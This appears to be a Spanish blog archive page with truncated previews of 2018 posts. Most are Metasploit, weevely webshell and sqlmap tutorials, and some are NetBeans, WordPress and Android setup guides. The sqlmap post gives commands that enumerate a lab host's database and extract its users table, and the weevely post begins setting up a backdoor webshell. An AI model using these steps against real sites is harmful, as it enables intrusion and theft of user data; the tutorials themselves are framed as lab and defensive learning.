Entradas

Mostrando las entradas de 2018

03.- Crear nuestro primer exploit en metasploit

Imagen
Antes de continuar vamos a ver que es un exploit, exploit en español significa explotar, en español es un concepto muy amplo se podría entender como explotar recursos, como madera, minerales, pero aquí se debe entender la la palabra explotar como hacer explotar algo, porque virtualmente es lo que hacemos explotar algún elemento virtual. supongamos que hay un banco muy seguro pero sabemos que tiene un muro débil y para romper ese muro debemos poner una carga de dinamita de exactamente 2.4Kg no menos porque no se romperá ni más porque se activaran las alarmas y se cerrará. Eso es lo que es un exploit una carga de dinamita especialmente preparada para romper un muro.

En este tutorial vamos a crear nuestro propio exploit con el cual vamos a verificar que tipo de servicio ftp cuenta alguna maquina remota.
Vamos a abrir el path  /usr/share/metasploit-framework/modules/auxiliary/scanner/ftp


Donde vamos a crear un documento llamado ftp_access.rb

Lo abrimos y colocamos este codigo


### This mod…

02.- Mi primer exploit en Kali Linux con Metasploit

Imagen
En este tutorial vamos a trabajar con un simple exploit que nos ofrece metasploit y es http_version el cual solo va entregar algunos datos de la maquina victima. Hay que aclarar que es un archivo con extensión rb osea que esta desarrollado en Ruby (todo metasploit esta desarrollado en Ruby).

El modulo a estudiar es http_version.rb y se encuentra ubicado en:
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/http_version.rb
Este exploit nos dice algunas caracteristicas de la victima como:
Sistema Operativo: Windows, Ubuntu, Debian, Centos
Servidor web: Nginx, Apache, IIS
Protocolo: http o https

Para usar ese modulo debemos escribir en la terminal:
msfconsole use auxiliary/scanner/http/http_version Para ver las opciones debemos poner show options A lo que no regresa algo asi

Para dar de alta una pagina a explorar ponemos
set RHOSTS islalocal.com Despues
exploit A lo que nos regresara esto:

Para cambiar el perto de http a https debemos escribir esto:
set RPORT 443 Y hacemos el mimos…

01.- Que es metasploit ?

Imagen
¿Que es Metasploit? Metasploit es una herramienta que puede nos ayudar a penetrar sistemas informáticos vulnerables, no necesariamente se usa para atacar a terceros también es útil para analizar la seguridad de nuestros propios sistemas. Aunque este curso se centra en metasploit sobre kali linux cabe aclarar que metasploit también funciona sobre cualquier distribución y sobre cualquier sistema operativo, en este tutorial muestro como podemos implementar metasploit sobre ubuntu  https://www.youtube.com/watch?v=IBYd7pUg1-Y.




Historia de Metasploit: Metasploit fue creado por H.D Moore en el 2003, usando el lenguaje Perl. El 21 de octubre de 2009,  Metasploit fue adquirido por Rapid7, una empresa de seguridad.


¿Porque usar Metasploit? 1.- Fácil de usar: Una vez instalado el núcleo metasploit el siguiente paso es ejecutar los programas además de estar perfectamente documentados.
2.- Escalable: Ademas de usar los scripts de metasploit podemos crear nuestros propios scripts.
3.- Opensource: …

Instalar Netbeans 10 en Windows 10

Imagen
Introducción Ahora que netbeans se movió hacia apache pues se perdió algo invaluable para los usuarios de windows y es el instalador, ahora es necesario configurar algunos elementos de de este IDE, aunque es fácil de hacer nos quita un poco de tiempo cada vez que hacemos una nueva instalación, pero no hay que preocuparse en estos simples pasos podemos hacer dicho proceso en 3 minutos o menos.

Instalación Requerimientos tener URL de Java JDK 9 

Descargamos Netbeans desde esta URL

Lo descomprimimos


Abrimos el archivo "incubating-netbeans-10.0-bin\netbeans\etc\netbeans.conf" y buscamos el texto "netbeans_jdkhome" quitamos el # y ponemos el path de nuestro java 10


Nos movemos al path "incubating-netbeans-10.0-bin\netbeans\bin" y hacemos click en netbeans64.exe o netbeans.exe (dependiendo de nuestr SO)


Y listo


Instalar netbeans 10 en ubuntu 18.04

Imagen
Introducción Puede parecer difícil trabajar en Ubuntu (o cualquier sistema operativo en base linux) y si a esto le agregamos que tenemos que configurar netbeans pues termina siendo un pequeño dolor de cabeza, pero no nos demos por vencidos hay muy buenos tutoriales (como este) que nos explican paso a paso que es lo que debemos hacer y al final termina siendo un paseo por el parque.

Instalación (Opcional) Actualizar repositorios
sudo apt update
Agregar el PPA de java a nuestro repositorio
sudo add-apt-repository ppa:webupd8team/java
Nuevamente actualizar repositorios e instalamos java jdk
sudo apt update sudo apt install default-jre default-jdkRevisamos que java este correctamente instalado
javac -version
Debe salir algo asi
javac 10.0.2
Y listo ahora procedemos a instalar Netbeans
Descargamos netbeans desde este link

Descomprimimos el archivo descargado


Entramos a la carpeta extraída hasta "incubating-netbeans-10.0-bin/netbeans/etc/" una vez ahi abrimos el archivo netbeans.conf


Subir articulos de prueba a Wordpress

Imagen
Introducción En ocasiones cuando hacemos una nueva instalación de WordPress desde cero y todavía no hay ningún articulo para la web, por cualquier razón, una de las tareas más tediosas es crear contenido demo, dummy o de prueba para verificar cómo se va a ver cada una de las páginas. Para resolver este problema podemos usar el area de importacion de wordpress la cual presentó en el siguiente manual:

Instalación
1.- Descargamos este archivo en cualquier parte de mi la maquina local en mi caso "/home/eugenio/Descargas/theme-unit-test-data.xml"

2.- Vamos al wp-admin->Herramientas->Importar->Ejecutar importador


3.- Click en Seleccionar archivo, ubucamos el archivo que descargamos en el paso 1 y despues click en Subir archivo e importar.

4.- Click en Submit



5.- Nos debe arrojar un resultado asi

6.- Ahora podemos ir al area de entradas y ver todos los articulos que se han creado



Backdoor Webshell con weevely en Kali Linux

Imagen
Introducción En este manual vamos a analizar la forma en la que usuarios malintencionados pueden llegar a tomar control de nuestros sistemas web (paginas web). Para evitar que lleguen a colocarnos archivos archivos maliciosos en nuestro sistema debemos de sanitisar nuestro código con las medidas de seguridad que el mismo php recomienda
Recordemos que para hacer nuestras pruebas debemos tener un sistema de pruebas con vulnerabilidades lo cual lo podemos instalar siguiendo este manual. Instalación En los siguientes sencillos 3 pasos podemos iniciar nuestra pruebas con weevely:
1.- Instalamos PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima. git clone https://github.com/Anorov/PySocks.git cd PySocks python setup.py install Nos salimos de la carpeta cd .. 2.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima Descargamos y entramos a weevely git clone https://github.com/epinna/weevely3.git cd weevely3 Creamos u…

Sqlmap en Kali Linux

Imagen
Introducción SqlMap es una ligera pero potente herramienta que nos ayuda encontrar vulnerabilidades web-mysql en nuestros sitios web. SqlMap lo que hace es buscar alguna forma de inyectar sql y asi obtener accesos elevados. Podríamos usar esta herramienta ya sea para encontrar vulnerabilidades en nuestros sistema o para atacar a terceros. en este tutorial voy a mostrar algunos comandos basicos y una prueba de ataque y acceso a una pagina vulnerable
Instalación 1.- Vamos a obtener la bd
sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs Esto nos debe de regresar algo asi


2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables Este es el resultado


3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns Este es el resultado:



4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas…

Kali linux colocar dock (menu) en la parte inferior

Imagen
Introducción Eres nuevo en kali linux, vienes de windows, si lo se, es complicado adaptarse al entorno de escritorio (por cierto se llama gnome). A mi en lo particular me gustaría que se pareciera más a Windows, es mas no me quede con las ganas y he creado un curso donde te muestro las herramientas y configuración que te ayudaran a hacer a kali linux mas parecido a windows.
Instalación Presionamos tecla windows y escribimos retoques y damos click en el icono




Seleccionamos el engrane de "Dash to dock"


En la pestaña "Posicion y tamaño" Seleccionamos inferior


























Compartir pantalla de android en Ubuntu 18.04 con Screen Stream over HTTP

Imagen
Introducción Aceptemoslo, es un poco complicado vincular linux con nuestro teléfono android (o quizá solo a mi me ha pasado) por suerte existe infinidad de aplicaciones que comparten nuestra pantalla android en a través de un servicio web una de esas herramienta es Screen Stream over HTTP. Es un proceso realmente simple, solo debemos descargar la app de google play y seguir 3 simple pasos los cuales mostramos a continuación:

Instalación 1.- En google play buscamos "Screen Stream over HTTP" y click en instalar


2.- Abrimos la aplicación.



3.- Click en el icono de start stream.


4.- Click en Comenzar ahora.

6.- Abrimos la url http://192.168.8.101:8080 (la que muestra en telefono)



7.- Ahora podemos ver nuestro android en el navegador












Compartir pantalla de android en Ubuntu 18.04 con screen mirror

Imagen
Introducción Aceptemoslo, es un poco complicado vincular linux con nuestro teléfono android (o quizá solo a mi me ha pasado) por suerte existe infinidad de aplicaciones que comparten nuestra pantalla android en a través de un servicio web una de esas herramienta es screen mirror smart dato vgmbh. Es un proceso realmente simple, solo debemos descargar la app de google play y seguir 3 simple pasos los cuales mostramos a continuación:
Instalación 1.- En google play buscamos "screen mirror smart dato vgmbh"
2.- Instalamos la aplicación.

3.- Abrimos la aplicación.

4.- Click en el icono de streaming.

5.- Damos click en permitir.

6.- Abrimos esta url http://screenmirrorapp.com y con el telefono escaneamos el codigo QR

7.- Click en comenzar ahora.

8.- Ahora podemos ver nuestro android en el navegador






Facebook Like